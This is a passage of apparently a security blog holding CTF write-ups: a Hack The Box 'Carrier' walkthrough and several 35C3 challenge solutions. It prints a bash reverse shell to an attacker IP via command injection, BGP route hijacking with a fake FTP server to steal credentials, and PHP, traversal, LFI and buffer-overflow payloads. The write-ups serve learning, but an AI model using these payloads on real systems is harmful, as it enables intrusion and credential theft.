X8gEI3iY157v5scgrOKFjw39cTMuTfLc7/rM8e2TOeziN4yzzLfWAiTbe4wfiDe8cea7zJ1RFwvgGc398xiOA8bo1nwMD0wUkduJhtH4V98LpJZOVB4tMmtCdyb1T+e3HIR/1Wbm
MBLs0e6Cc/rf+K8vgqu6Tu/o4o8/TZ9aH9K5xoDRUXjU2R1w/Bi0HvYYHFRf664/NG9WcK/R0VlV6j92DOYL9wdUYwANyQPc4YCDfyuM6F6Bbd
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJToeoLQWJwkfcWBimMzO4E6BKOaHbTkWIk1uHoniOdaUaDL5C6MO2NeYYSaru
/ikAYSHPU83p1p6hNcOJVy+OY=
|   256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIN0vm7BcvmBgddJb7k1W7qUkBgn2n0T1bdOU6GV1JB8
80/tcp open     http    syn-ack     Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A UDP scan turned out to be also very interesting (--max-retries 0 drastically reduces the scanning time).

$ sudo nmap -sU --max-retries 0 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-16 19:38 CET
Warning: 10.10.10.105 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.105
Host is up (0.040s latency).
Not shown: 991 open|filtered ports
PORT      STATE  SERVICE
161/udp   open   snmp
[...]

Very SNMP

Nmap Scripting Engine provides a script named snmp-brute, which is useful for bruteforcing snmp communities.

$ sudo nmap -sU --script snmp-brute -p161 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-16 19:42 CET
Nmap scan report for 10.10.10.105
Host is up (0.041s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute:
|_  public - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds

snmpwalk is a script automating the exploration of a MIB for a given community. Thanks to this tool, we could retrieve a string that will be essential in the rest of the box.

$ snmpwalk -c public 10.10.10.105 -v1
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB

Let’s move on to the web server!

Lyghtspeed web server

The web server showed a login page when browsing to http://10.10.10.105:80 as well as error codes 45007 and 45009.

Trivial username/password combinations were not successful so I focused on the enumeration using gobuster.

$ gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -x php

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.105/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/03/16 20:14:41 Starting gobuster
=====================================================
/index.php (Status: 200)
/img (Status: 301)
/tools (Status: 301)
/doc (Status: 301)
/css (Status: 301)
/js (Status: 301)
/tickets.php (Status: 302)
/fonts (Status: 301)
/dashboard.php (Status: 302)
/debug (Status: 301)
/diag.php (Status: 302)
=====================================================
2019/03/16 20:17:32 Finished
=====================================================

Most of the potentially interesting pages redirected to the login page. However, a pdf file named “error_codes.pdf” was available under /doc.

error_codes.pdf gives a description for every error code of the Lyghtspeed Management Platform. Let’s study the meaning of codes 45007 and 45009 that we’ve seen ealier on the login page.

The string we found in the MIB is actually the serial number of the chassis (SN#NET_45JDX23).

Thanks to this indication, I managed to login with the following credentials: admin/NET_45JDX23.

From Command Injection to Reverse Shell

Once logged in, a dashboard and two other pages were accessible.

Tickets

The “Tickets” page gave a lot of clues about the second part of the exploitation. It was mentioning a Nigerian Prince having issues connecting to a FTP server. BGP routing among AS was also evoked.

Diagnostics

The “Diagnostics” page seemed to show the output of the command ps -aux | grep quagga | grep -v grep.

After examining the POST request sent when clicking on “Verify status” with Burp, it occurred that the check parameter was the base64-encoding of “quagga”.

Let’s see if we can control the output by modifying this parameter:

Indeed, the output has been modified to show everything related to “ssh”. Now, let’s try to inject other commands in order to get a reverse shell on the machine.

SPOILER: The user flag can be retrieved without getting a reverse shell but it is mandatory for the rest of the box.

Road to Reverse Shell

This one was pretty difficult to trigger, I must have tried a dozen of different reverse shell payloads before finding the right one: ; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.89/9999 0>&1"

Base64 encode the payload: OyAvYmluL2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuODkvOTk5OSAwPiYxIg==
Setup a local listener: nc -lvnp 9999
Send the command inside the POST request via the check parameter (Burp Repeater ).

$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.89] from (UNKNOWN) [10.10.10.105] 58148
bash: cannot set terminal process group (25835): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~#

Surprise! We’re root already.

The user flag can be retrieved at /root/user.txt.

cat /root/user.txt
5649[...]

Half of the job is done, let’s move on to the privilege escalation phase!

NOTE: Only after finishing the box, I realized that I could have simply added my own ssh public key to /root/.ssh/authorized_keys, which would have allowed me to login via ssh…

Privilege escalation

Upgrading to a fully interactive reverse shell is a good reflex to adopt as soon as we’re dealing with a reverse shell (see my other article Upgrading to a fully interactive reverse shell).

As a few hints suggested it, the privilege escalation part of this box is heavily network-related.

Network configuration

The first step consisted in understanding the network topology and examining every configuration files that could give information about it.

The following diagram, available on the web server (http://10.10.10.105/doc/diagram_for_tac.png), was very helpful for understanding the network context:

Network interfaces

The router we’re connected to has 3 network interfaces.

root@r1:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:d9:04:ea brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.99.64.2/24 brd 10.99.64.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fed9:4ea/64 scope link
       valid_lft forever preferred_lft forever
10: eth1@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:8a:f2:4f brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.10.1/24 brd 10.78.10.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe8a:f24f/64 scope link
       valid_lft forever preferred_lft forever
12: eth2@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:20:98:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.11.1/24 brd 10.78.11.255 scope global eth2
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe20:98df/64 scope link
       valid_lft forever preferred_lft forever

BGP configuration

The BGP configuration is available in /etc/quagga/bgpd.conf:

root@r1:~# cat /etc/quagga/bgpd.conf
cat /etc/quagga/bgpd.conf
!
! Zebra configuration saved from vty
!   2018/07/02 02:14:27
!
route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
!
line vty
!

Routing table

The routing table can be displayed using ip r:

root@r1:~# ip r
ip r
default via 10.99.64.1 dev eth0 onlink
78.10.0/24 dev eth1  proto kernel  scope link  src 10.78.10.1
78.11.0/24 dev eth2  proto kernel  scope link  src 10.78.11.1
99.64.0/24 dev eth0  proto kernel  scope link  src 10.99.64.2
100.10.0/24 via 10.78.10.2 dev eth1  proto zebra
100.11.0/24 via 10.78.10.2 dev eth1  proto zebra
100.12.0/24 via 10.78.10.2 dev eth1  proto zebra
100.13.0/24 via 10.78.10.2 dev eth1  proto zebra
100.14.0/24 via 10.78.10.2 dev eth1  proto zebra
100.15.0/24 via 10.78.10.2 dev eth1  proto zebra
100.16.0/24 via 10.78.10.2 dev eth1  proto zebra
100.17.0/24 via 10.78.10.2 dev eth1  proto zebra
100.18.0/24 via 10.78.10.2 dev eth1  proto zebra
100.19.0/24 via 10.78.10.2 dev eth1  proto zebra
100.20.0/24 via 10.78.10.2 dev eth1  proto zebra
120.10.0/24 via 10.78.11.2 dev eth2  proto zebra
120.11.0/24 via 10.78.11.2 dev eth2  proto zebra
120.12.0/24 via 10.78.11.2 dev eth2  proto zebra
120.13.0/24 via 10.78.11.2 dev eth2  proto zebra
120.14.0/24 via 10.78.11.2 dev eth2  proto zebra
120.15.0/24 via 10.78.11.2 dev eth2  proto zebra
120.16.0/24 via 10.78.11.2 dev eth2  proto zebra
120.17.0/24 via 10.78.11.2 dev eth2  proto zebra
120.18.0/24 via 10.78.11.2 dev eth2  proto zebra
120.19.0/24 via 10.78.11.2 dev eth2  proto zebra
120.20.0/24 via 10.78.11.2 dev eth2  proto zebra

Updated network diagram

From the network configuration files, we can deduce the IP address of other AS routers, as well as the subnets connected to these AS. This gives the following updated diagram:

What’s the plan?

We know from the tickets on the web server, that there is a valuable FTP server in the 10.120.15.0/24 network.
Routes are dynamically advertised via BGP and we have control over a BGP router.
The priority of BGP routes depends on the size of the advertised subnet (i.e. a route to 10.120.15.0/25 will be given a higher priority than one announcing 10.120.15.0/24).

If we sum up all of these assumptions, we should be able to advertise a fake route to the FTP server to our BGP neighbours so the Nigerian Prince will try to connect to a server inside our own subnet. Since we want to steal his credentials, we will need to setup an FTP server which will ask for a login and a password to anyone contacting it. Once those credentials stolen, we will stop advertising the fake route and connect to the real FTP server with the Nigerian Prince’s logins.

Because a picture speaks a thousand words:

Alright, it is time to move on to the realization.

10.120.15.0/24 scanning

We know the FTP server is somewhere inside the 10.120.15.0/24 subnet but we don’t have its exact IP address. A simple bash script executing ping on the whole subnet was enough to find out which hosts were up.

#!/bin/bash
if [ "$1" == "" ]
then
echo "Usage ./pingscript.sh [network]"
else
        for x in `seq 1 254`; do
                ping -c 1 $1.$x | grep "64 bytes" | cut -d" " -f4 | sed 's/.$//'
        done
fi

This script can be uploaded to r1 using wget on a local webserver running on our machine that we have just set up with python -m SimpleHTTPServer.

root@r1:~# wget http://10.10.14.89:8000/pingscript.sh -O /tmp/script.sh
wget http://10.10.14.89:8000/pingscript.sh -O /tmp/script.sh
--2019-03-17 13:26:31--  http://10.10.14.89:8000/pingscript.sh
Connecting to 10.10.14.89:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 182 [text/x-sh]
Saving to: ‘/tmp/script.sh’

     0K                                                       100% 19.6M=0s

2019-03-17 13:26:31 (19.6 MB/s) - ‘/tmp/script.sh’ saved [182/182]

The result of the execution revealed two hosts: 10.120.15.1 and 10.120.15.10.

root@r1:~# chmod +x /tmp/script.sh
chmod +x /tmp/script.sh
root@r1:~# /tmp/script.sh 10.120.15
/tmp/script.sh 10.120.15
10.120.15.1
10.120.15.10

Using the same technique as previously, I have uploaded a static version of nmap in order to scan the two hosts with more details.

10.120.15.1

The scan on the first host found didn’t show any FTP server.

root@r1:~# /tmp/nmap -v 10.120.15.1
/tmp/nmap -v 10.120.15.1

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2019-03-17 13:36 UTC
[...]
PORT    STATE SERVICE
22/tcp  open  ssh
179/tcp open  bgp

Read data files from: /etc
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
Raw packets sent: 1210 (53.216KB) | Rcvd: 1208 (48.388KB)

10.120.15.10

10.120.15.10 seems to be our guy!

root@r1:~# /tmp/nmap -v 10.120.15.10
/tmp/nmap -v 10.120.15.10

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2019-03-17 13:38 UTC
[...]
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
53/tcp open  domain

Read data files from: /etc
Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
Raw packets sent: 1210 (53.216KB) | Rcvd: 1208 (48.392KB)

We can now move on to the BGP Hijacking part.

BGP Hijacking

NOTE: The way I did BGP Hijacking was not the intended one, but it was much easier and faster. For a clear explanation of the intended method, I recommend you to watch ippsec’s video or to read 0xdf’s writeup.

Fake route Advertising

Quagga routers can be administrated via vtysh. In order to advertise a route to the BGP neighbors, the following commands are enough:

root@r1:~# vtysh
vtysh

Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

r1# conf t
conf t
r1(config)# router bgp 100
router bgp 100
r1(config-router)# network 10.120.15.0/25
network 10.120.15.0/25
r1(config-router)# exit
exit
r1(config)# exit
exit

The prefix /25 is voluntarily more specific than /24 so that our route will be given a higher priority.

Changing eth2 ip address

Now, we have to add the ip address of the FTP server to eth2 interface.

root@r1:~# ip addr add 10.120.15.10/25 dev eth2
ip addr add 10.120.15.10/25 dev eth2
root@r1:~# ip a
ip a
[...]
12: eth2@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:20:98:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.11.1/24 brd 10.78.11.255 scope global eth2
       valid_lft forever preferred_lft forever
    inet 10.120.15.10/25 scope global eth2
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe20:98df/64 scope link
       valid_lft forever preferred_lft forever

The Nigerian Prince should now be redirected to our machine. We can verify this by listening on port 21 with nc:

root@r1:~# nc -lvnp 21
nc -lvnp 21
Listening on [0.0.0.0] (family 0, port 21)



Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 44696)
USER root
PASV
QUIT

We can see that the user root is trying to login but it disconnects instantly since our server is not answering.

Faking an FTP server

There is no need to code something complicated in order to fake an FTP server, it can be very simply done with nc. The FTP protocol uses raw telnet commands so we can fake a server by typing response codes manually. All we have to do is to reply with code 331 after the user has sent his username. Then, the user will supply his password in plaintext.

root@r1:~# nc -lvnp 21
nc -lvnp 21
Listening on [0.0.0.0] (family 0, port 21)

Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 44728)                                                          
USER root
331 Follow @BoiteAKlou    # Typed manually
PASS BGPtelc0rout1ng

PASV

QUIT

Retrieving the flag

It looks like we have the root credentials of the real FTP server! Let’s verify this.

After removing the ip address of the FTP server from eth2 and resetting the BGP configuration, we are finally able to connect to the real Carrier machine (FTP credentials == SSH credentials).

root@r1:~# ip addr del 10.120.15.10/25 dev eth2
root@r1:~# ifdown eth2
ifdown eth2
root@r1:~# ifup eth2
ifup eth2
root@r1:~# ping -c 1 10.120.15.10
ping -c 1 10.120.15.10
PING 10.120.15.10 (10.120.15.10) 56(84) bytes of data.
64 bytes from 10.120.15.10: icmp_seq=1 ttl=63 time=0.054 ms

--- 10.120.15.10 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.054/0.054/0.054/0.000 ms
root@r1:~# python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@r1:~# ssh [email protected]
ssh [email protected]
[email protected]'s password: BGPtelc0rout1ng

Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 17 15:31:44 UTC 2019

  System load:  0.07               Users logged in:       0
  Usage of /:   40.8% of 19.56GB   IP address for ens33:  10.10.10.105
  Memory usage: 47%                IP address for lxdbr0: 10.99.64.1
  Swap usage:   1%                 IP address for lxdbr1: 10.120.15.10
  Processes:    220


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

4 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Sep  5 14:32:15 2018
root@carrier:~# ls
ls
root.txt  secretdata.txt
root@carrier:~# cat root.txt
cat root.txt
283[...]

Final words

I would like to thank snowscan, the author of this great box. It’s pretty rare to find network-related boxes because it requires a lot of preparation and materials. However, boxes like this are very realistic and allow us to learn a lot of new skills.

Thanks for reading this writeup, I hope you’ve enjoyed!

BoiteAKlou :hammer:

35C3 CTF Writeups

2018-12-31T16:00:00+00:00

This weekend was held the 35th Chaos Communication Congress (35C3) as long as its excellent CTF. Hopefully, a Junior CTF was also proposed, which was way more accessible than the main CTF (at least for me :wink:). In this post, you’ll find concise writeups of most of the challenges my team and I solved from both CTFs.

[Main CTF] Web - php
- Solution
[Junior CTF] Web - flags
- Solution
[Junior CTF] Web - logged in
- Solution
[Junior CTF] Web - McDonald
- Solution
[Junior CTF] Web - Note(e) accessible
- Solution
[Junior CTF] Pwn - 1996
- Solution
[Junior CTF] Pwn - poet
- Solution
[Junior CTF] Forensic - rare_mount
[Junior CTF] Forensic - epic_mount
[Junior CTF] Forensic - legendary_mount

[Main CTF] Web - php

PHP’s unserialization mechanism can be exceptional. Guest challenge by jvoisin.

Files at https://35c3ctf.ccc.ac/uploads/php-ff2d1f97076ff25c5d0858616c26fac7.tar. Challenge running at: nc 35.242.207.13 1

We were given the following PHP script:

<?php

$line = trim(fgets(STDIN));

$flag = file_get_contents('/flag');

class B {
  function __destruct() {
    global $flag;
    echo $flag;
  }
}

$a = @unserialize($line);

throw new Exception('Well that was unexpected…');

echo $a;

Here is what we can observe:

The user input isn’t sanitized before being unserialized.
Instantiating an object of type “B” would echo the flag.

Solution

The following serialized payload will create a B object when getting unserialized: O:1:"B":1:{s:4:"flag"}.

We can translate this payload into: “An Object whose name is 1 char long, which has a string whose name is flag of size 4”.

[Junior CTF] Web - flags

Fun with flags: http://35.207.132.47:84

Flag is at /flag

Difficulty estimate: Easy

Here is a screen capture of the website’s frontpage:

Observations:

$lang parameter is defined by HTTP_ACCEPT_LANGUAGE header.
str_replace removes “../” but is only called once.
The output of file_get_contents is base64-encoded inside the image.

Solution

str_replace will remove “../” from the user-controlled header, but what about this string “…/./”?

$ php -a
php > echo str_replace('../','','..././');
../

Based on this, we can forge the following payload: ..././..././..././..././..././..././..././..././flag

php > echo str_replace('../','','..././..././..././..././..././..././..././..././flag');
../../../../../../../../flag

Then put it in place of the HTTP_ACCEPT_LANGUAGE header with Burpsuite and we have the following result:

</code><img src="data:image/jpeg;base64,MzVjM190aGlzX2ZsYWdfaXNfdGhlX2JlNXRfZmw0Zwo=">

echo "MzVjM190aGlzX2ZsYWdfaXNfdGhlX2JlNXRfZmw0Zwo=" | base64 -d
35c3_this_flag_is_the_be5t_fl4g

[Junior CTF] Web - logged in

Phew, we totally did not set up our mail server yet. This is bad news since nobody can get into their accounts at the moment… It’ll be in our next sprint. Until then, since you cannot login: enjoy our totally finished software without account.

http://35.207.132.47/

Difficulty Estimate: Easy

We are facing a very basic website with a login functionnality asking for a username and sending a verification code. If we submit the right verification code, we get logged in. Pretty simple, right?

Solution

Actually, the mail sending functionnality is not implemented yet and the verification code is retrieved by our client with a simple API call, as shown in the following screen capture:

We can now submit the verification code to the appropriated field:

And we can read the flag inside the cookies section:

[Junior CTF] Web - McDonald

Our web admin name’s “Mc Donald” and he likes apples and always forgets to throw away his apple cores..

http://35.207.132.47:85

This webpage was empty at first but the robots.txt file shows us the following path: /backup/.DS_Store.

.DS_Store is a macOS only file which stores attributes of its containing folder. The idea, here, is to retrieve the location of the flag with the help of .DS_Store files. Problem is that the creator of this challenge was pretty naughty and created loads of subdirectories named “a”, “b” or “c”…

Solution

Thanks to File Disclosure Browser, we could parse the .DS_Store file and extract information about the name of other files in the current folder.

boiteaclou@Kalinka:~/CTF/2018/35C3-Junior/Web/McDonald$ fdb/fdb.pl --type ds --filename ./DS_Store --base_url http://35.207.91.38/backup
/.DS_Store                                                                                                                              
URL: http://35.207.91.38/backup/.DS_Store/a
URL: http://35.207.91.38/backup/.DS_Store/a    
URL: http://35.207.91.38/backup/.DS_Store/a
URL: http://35.207.91.38/backup/.DS_Store/a   
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b   
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/b
URL: http://35.207.91.38/backup/.DS_Store/c                               
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c
URL: http://35.207.91.38/backup/.DS_Store/c

To make the browsing of all the subdirectories faster, I created a small wordlist containing the strings “a”, “b”, “c” and “.DS_Store” and fed it to dirb.

$ cat out.dirb | grep 200
+ http://35.207.91.38/backup/.DS_Store (CODE:200|SIZE:10244)
+ http://35.207.91.38/backup/b/.DS_Store (CODE:200|SIZE:6148)
+ http://35.207.91.38/backup/c/.DS_Store (CODE:200|SIZE:8196)
+ http://35.207.91.38/backup/b/a/.DS_Store (CODE:200|SIZE:8196)
+ http://35.207.91.38/backup/b/b/.DS_Store (CODE:200|SIZE:6148)
+ http://35.207.91.38/backup/c/b/.DS_Store (CODE:200|SIZE:12292)
+ http://35.207.91.38/backup/c/c/.DS_Store (CODE:200|SIZE:8196)
+ http://35.207.91.38/backup/b/a/b/.DS_Store (CODE:200|SIZE:6148)
+ http://35.207.91.38/backup/b/a/c/.DS_Store (CODE:200|SIZE:6148)
+ http://35.207.91.38/backup/b/b/c/.DS_Store (CODE:200|SIZE:6148)

Manually exploring each .DS_Store file revealed the presence of flag.txt under http://35.207.91.38/backup/b/a/c/flag.txt

35c3_Appl3s_H1dden_F1l3s

[Junior CTF] Web - Note(e) accessible

We love notes. They make our lifes more structured and easier to manage! In 2018 everything has to be digital, and that’s why we built our very own note-taking system using micro services: Not(e) accessible! For security reasons, we generate a random note ID and password for each note.

Recently, we received a report through our responsible disclosure program which claimed that our access control is bypassable…

http://35.207.132.47:90

Difficulty estimate: Easy-Medium

This website allows us to create a note and to consult it with an URL of this form: http://35.207.120.163/view.php?id=6578216296439429496&pw=47bce5c74f589f4867dbd57e9ca9f808 .

The source of this challenge is available under /src.tgz.

Observations:

The pw parameter is the md5 hash of the note’s content.
In the code, we see that the id is a random Integer.

The code of view.php suggests a LFI vulnerability:

<?php
 require_once "config.php";
 if(isset($_GET['id']) && isset($_GET['pw'])) {
     $id = $_GET['id'];
     if(file_exists("./pws/" . (int) $id . ".pw")) {
         if(file_get_contents("./pws/" . (int) $id . ".pw") == $_GET['pw']) {
             echo file_get_contents($BACKEND . "get/" . $id);
         } else {
             die("ERROR!");
         }
     } else {
         die("ERROR!");
     }
 }
?>

The flag will be echoed if we manage to make a GET request to /admin:
```
get '/admin' do
     File.read("flag.txt")
end
```

Solution

Combining the LFI with the get request to /admin gives the following payload:

http://35.207.120.163/view.php?id=6578216296439429496/../../admin&pw=47bce5c74f589f4867dbd57e9ca9f808

The id and pw are the ones from a test note we’ve created before, they have to be valid in order for the exploit to work.

[Junior CTF] Pwn - 1996

It’s 1996 all over again!

nc 35.207.132.47 22227

Difficulty estimate: very easy

First pwning challenge of this CTF! A very basic one to warm us up :wink:. We were given this zip containing the binary and its C++ source code.

// compile with -no-pie -fno-stack-protector

#include <iostream>
#include <unistd.h>
#include <stdlib.h>

using namespace std;

void spawn_shell() {
    char* args[] = {(char*)"/bin/bash", NULL};
    execve("/bin/bash", args, NULL);
}

int main() {
    char buf[1024];

    cout << "Which environment variable do you want to read? ";
    cin >> buf;

    cout << buf << "=" << getenv(buf) << endl;
}

Observations:

The binary has been compiled without stack protector.
The buffer overflow is pretty obvious here.
a spawn_shell function is given to help us.

Solution

The objective here is to overwrite the return address of the main function with the address of the spawn_shell function.

We have to determine the overflow offset, either manually or with gdb, then, to get the address of the spawn shell function.

Overflow offset:

kali:~/CTF/2018/35C3-Junior/Pwn/1996$ python -c 'print "A"*1048' |./1996
Which environment variable do you want to read? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA=Segmentation fault

spawn_shell address:

objdump -D ./1996 | grep spawn
0000000000400897 <_Z11spawn_shellv>:

Now, we can verify our payload on our local machine without forgetting to catch the standard input with cat to avoid the shell to close itself immediately:

kali:~/CTF/2018/35C3-Junior/Pwn/1996$ (python -c 'print "A"*1048+"\x97\x08\x40\x00\x00\x00\x00\x00"'; cat) | ./1996
Which environment variable do you want to read? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@=
whoami
boiteaklou

Working! We can now retrieve the flag.

[Junior CTF] Pwn - poet

We are looking for the poet of the year:

nc 35.207.132.47 22223

Difficulty estimate: very easy

